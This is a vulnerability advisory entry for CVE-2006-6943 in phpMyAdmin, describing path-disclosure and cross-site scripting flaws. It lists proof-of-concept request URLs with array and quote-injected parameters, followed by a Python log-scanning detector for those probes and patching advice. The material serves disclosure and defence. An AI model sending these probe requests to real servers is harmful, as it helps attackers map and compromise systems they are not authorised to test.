phpMyAdmin Multiple Input Validation Vulnerabilities

Vulnerability ID: 1111040    Vulnerability type: Input validation
Published: 2006-09-15    Updated: 2007-08-07
CVE: CVE-2006-6943    CNNVD-ID: CNNVD-200701-302
Platform: PHP    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/29062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-302
|Vulnerability details
phpMyAdmin before 2.9.1.1 allows remote attackers to obtain the full server path via direct requests to (a) scripts/check_lang.php and (b) themes/darkblue_orange/layout.inc.php; via the (1) lang[], (2) target[], (3) db[], (4) goto[], (5) table[] and (6) tbl_group[] array parameters submitted to (c) index.php; via the (7) back[] parameter to (d) sql.php; via the (8) sort_by parameter to (e) server_databases.php; and via the (9) db parameter to (f) db_printview.php.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/21137/info

phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities.

An attacker could exploit these vulnerabilities to view sensitive information or to have arbitrary script code execute in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials or change the way the site is rendered to the user. Data gained could aid in further attacks.

All versions of phpMyAdmin are vulnerable.

http://www.example.com/scripts/check_lang.php
http://www.example.com/themes/darkblue_orange/layout.inc.php
http://www.example.com/index.php?lang[]=
http://www.example.com/index.php?target[]=
http://www.example.com/index.php?db[]=
http://www.example.com/index.php?goto[]=
http://www.example.com/left.php?server[]=
http://www.example.com/index.php?table[]=
http://www.example.com/server_databases.php?token=your_token&sort_by="
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]=
http://www.example.com/db_printview.php?db="
http://www.example.com/sql.php?back[]=
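The request shapes listed above (direct hits on the two include files, and `name[]=` array parameters sent to scripts that expect a string) are easy to spot in web server logs. The following detector is an added example, not part of the original advisory or of phpMyAdmin; it assumes Apache combined log format and a `/phpmyadmin` mount point, and the log lines are constructed. It covers only the array and direct-request forms, not the `sort_by` and `db` string parameters.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request shapes named in the advisory: direct requests to two include files,
# and "name[]=" array parameters sent to scripts that expect a plain string.
DIRECT_PATHS = {"/scripts/check_lang.php", "/themes/darkblue_orange/layout.inc.php"}
ARRAY_PARAMS = {
    "/index.php": {"lang", "target", "db", "goto", "table", "tbl_group"},
    "/left.php": {"server"},
    "/sql.php": {"back"},
}

# Apache combined log format; the request target sits inside the quoted request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_path_disclosure_probes(lines, pma_prefix="/phpmyadmin"):
    """Return (ip, target, reason) per request matching the advisory's patterns (pma_prefix is assumed)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access log line
        url = urlsplit(m.group("target"))
        if not url.path.startswith(pma_prefix):
            continue
        rel = url.path[len(pma_prefix):]
        if rel in DIRECT_PATHS:
            findings.append((m.group("ip"), m.group("target"), "direct include request"))
            continue
        # keep_blank_values: the probes send "lang[]=" with an empty value
        for name, _ in parse_qsl(url.query, keep_blank_values=True):
            if name.endswith("[]") and name[:-2] in ARRAY_PARAMS.get(rel, set()):
                findings.append((m.group("ip"), m.group("target"), "array parameter " + name))
                break
    return findings

# Constructed sample log lines (not real traffic); line 3 is a normal request.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Sep/2006:10:01:02 +0000] "GET /phpmyadmin/index.php?lang[]= HTTP/1.1" 200 5123
198.51.100.7 - - [15/Sep/2006:10:01:03 +0000] "GET /phpmyadmin/scripts/check_lang.php HTTP/1.1" 200 310
203.0.113.5 - - [15/Sep/2006:10:02:00 +0000] "GET /phpmyadmin/index.php?lang=en-utf-8&db=test HTTP/1.1" 200 9876
198.51.100.7 - - [15/Sep/2006:10:03:00 +0000] "GET /phpmyadmin/sql.php?back[]= HTTP/1.1" 200 4001
203.0.113.5 - - [15/Sep/2006:10:04:00 +0000] "GET /phpmyadmin/index.php?db=test&table[]= HTTP/1.1" 200 4410
"""

if __name__ == "__main__":
    for ip, target, reason in find_path_disclosure_probes(SAMPLE_LOG.splitlines()):
        print(f"{ip} {reason}: {target}")
```

A hit is a probe, not proof of disclosure: the path only leaks when PHP warnings are displayed, so confirm `display_errors` is off and patch to 2.9.1.1 or later.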
|References

Source: www.phpmyadmin.ne
Link: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-8
Source: BID
Name: 21137
Link: http://www.securityfocus.com/bid/21137
Source: BUGTRAQ
Name: 20061116 PhpMyAdmin all version [multiples vulnerability]
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=116370414309444&w=2